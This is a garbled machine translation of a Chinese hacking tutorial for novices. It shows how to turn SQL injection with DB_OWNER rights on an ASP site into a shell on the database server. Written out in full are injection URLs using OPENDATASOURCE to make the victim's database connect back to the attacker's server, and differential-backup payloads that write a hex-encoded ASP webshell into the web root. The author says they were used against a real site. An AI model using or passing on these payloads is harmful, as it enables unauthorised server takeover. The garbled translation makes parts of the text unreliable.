DB_OWNER idea encountered during the Injection Process

First, declare that this article was written to cainiao friends.

. Inject now! There are a lot of tools. In the past, the manual injection era no longer exists! Instead of nbsi hdsi ah d injection tool .. and so on. it is also a favorite of many cainiao. even nothing. I don't know anything. just a few mouse clicks. the website password with the injection vulnerability is displayed. next we will scan the background. upload a Trojan. it's done. this is simple. the SA permission is met. open 3389 or upload WEBSHELL directly. ing is performed on the Intranet. if it is DB_OWNER permission, backup difference should be considered. but the WEB and database are not on the same server. How can this problem be solved? In fact, it may not be a problem. in addition to the DOS command to start the key value in the Registry, the target server will be started and executed, but it also has limitations. the user must be authorized to the Master database. you can call the stored procedure. few administrators do this. so the hope is very small. what should we do if this happens? See Figure 1

DB permission. Check whether the data is in the same directory as the WEB. If the data is in the same directory, consider the backup difference. Unfortunately, no WEB directory is found. 2

This is the path for reading through MSSQL's XP_dirtree storage process. Then write the result to the temporary table. Previously, NBSI didn't have this function. I had to scan the SA. Get the background information. later, NBSI added the treelist function. you can list directories for more convenient viewing of the directory structure. software information, etc. later, Getwebshell was developed to make the function shine for life, plug the horse into the database, and then back up the database as an ASP file. rows are feasible. however, if the database is too large. dozens of MB webshells can be used? The backup difference between Xiaolu is not bad. Reduce the file size and perform differential backup. However, back to the original point. The data is not in the same area as the WEB ......

In fact, even if the database and WEB are not in the same place, there is still a chance. It doesn't mean that there is no chance. Generally, if the server is installed with a system or something, it will install IIS, right? List his drive C. Check if there is any Inetpub directory. Then you will know if he has installed IIS. But if you do not know his IP address, too? What should we do? You can PING the WEB server. scan port 1433 of the C segment. check which server is available. however, this method is not good. many hosts now enable the firewall. even if port 1433 is enabled, you cannot scan it. what should I do? You can use the opendatasource macro to establish a connection between the other SQL statement and your own database. now you can establish a connection. you can get the IP address of the database server. let's try it. there are several prerequisites. first. your machine must have a public IP address. port 1433 must be accessible from the Internet. good. the condition is met. let's get started!

I am working on this site. 100% the data is not in the same area as the WEB. however, the Inetpub folder is displayed on disk C. this indicates that IIS is installed on the database server. but he cannot get his IP address. how can this problem be solved. simple. let's use the method mentioned above. create a database on the current machine first. open query analyzer Input
Create database hack520 create table zhu (name nvarchar (256) null); create table J8 (id int NULL, name nvarchar (256) null); execute. 4

Creates a database name for hack520. and zhu J8 tables. zhu contains the name field. j8 also has two field names. one is id and the other is name. okay. now we can start to establish a connection ~~~~~~~ First look at this SQL statement insert into opendatasource (sqloledb, server = your IP address; uid = SQL user; pwd = SQL password; database = created database name ). database Name. the statement executed by the table name is now...

Asp? Id = 126 insert % 20 into % 20 opendatasource (sqloledb, server = 219.149.xx.182; uid = sa; pwd = hack520! @ #77169; database "> http://www.xxx.com/news.asp? Id = 126 insert % 20 into % 20 opendatasource (sqloledb, server = 219.149.xx.182; uid = sa; pwd = hack520! @ #77169; database =

Hack520). hack5mongodbo. zhu % 20 select % 20 name % 20 from % 20master. dbo. sysdatabases --

Execute it on IE. At this time, the other party will connect to the SQL server on my machine. Do not believe it? Netstat-~ Figure 5

Haha has been connected. Now the IP address of the database server knows, and the database server has opened 80 again. What are you doing now?

Bak A webshell. We know the WEB directory C: Inetpubwwwroot. Good. Start.
Http://www.xxx.com/news.asp? Id = 126; use tg800; declare @ a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x737339323238 backup database @ a to disk = @ s -- backup the current database

Http://www.xxx.com/news.asp? Id = 126; Drop table [hack520]; create table [dbo]. [hack520] ([cmd] [image]) -- create a table

Http://www.xxx.com/news.asp? Id = 126; insert into hack520 (cmd) values (0x3c2565786563757450201095717565737428226c2229253e) -- insert a blue-screen Trojan

Http://www.xxx.com/news.asp? Id = 126; declare @ a sysname, @ s varchar (4000) select @ a = db_name (), @ s = 0x433a5c496e65747075625c777777109f6f745c7a68752e617370

Backup database @ a to disk = @ s with differential, FORMAT -- get WEBSHELL http://221.216xxx.xx/zhu.asp again with differential backup

Next we will use the blue-screen Trojan client to connect. this is simple. I will not talk about it here. although the WEB Server SHELL is not obtained. but at least it is not empty-handed. the SHELL of the database server is obtained. so far. 88